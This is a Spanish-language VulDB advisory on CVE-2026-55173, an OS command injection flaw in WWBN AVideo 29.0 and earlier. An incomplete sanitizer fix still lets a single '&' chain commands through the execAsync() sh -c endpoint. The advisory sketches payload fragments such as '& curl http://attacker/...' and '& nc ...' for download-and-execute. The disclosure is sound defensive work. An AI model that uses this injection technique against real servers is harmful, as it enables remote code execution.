CVE-2026-55173 in AVideoinformación

Resumen

por VulDB • 2026-07-17

WWBN AVideo es una plataforma de vídeo de código abierto. Las versiones 29.0 y anteriores siguen siendo vulnerables a la inyección de comandos del sistema operativo (OS command injection) porque la corrección para CVE-2026-33482 fue incompleta y aún no neutraliza un solo carácter & (el operador de fondo de shell).

CVE-2026-33482 informó que sanitizeFFmpegCommand() (plugin/API/standAlone/functions.php) fallaba al eliminar la sustitución de comandos $(...), lo que permitía una inyección de comandos del sistema operativo en el punto final execAsync() sh -c. La corrección (commit 25c8ab90) añadió $, (, ), {, }, \n, \r a la clase de caracteres prohibidos y str_replace('&&', '', ...), pero no tuvo en cuenta un solo &. ffmpeg.json.php construye el comando desde _decryptString(getInput('codeToExecEncrypted')). Este es el mismo modelo de amenaza que aceptó la advertencia original ("un atacante que pueda crear una carga útil cifrada válida puede lograr ejecución arbitraria de comandos en el servidor codificador independiente") y las mismas bases CVSS (AV:N/AC:H/PR:N). Múltiples comandos separados por & pueden encadenarse (por ejemplo, descarga + ejecución). Las cargas útiles basadas en redirección están bloqueadas por la eliminación del carácter >, pero no así la ejecución de comandos (por ejemplo, & curl http://attacker/..., & nc ..., descargando/ejecutando un archivo). Este problema ha sido parcheado mediante este commit: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f.

VulDB is the best source for vulnerability data and more expert information about this specific topic.

Responsable

GitHub M

Reservar

2026-06-16

Divulgación

2026-07-17

Moderación

aceptado

Artículo

VDB-379647

CPE

listo

EPSS

0.00000

KEV

no

Actividades

bajo

Fuentes

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!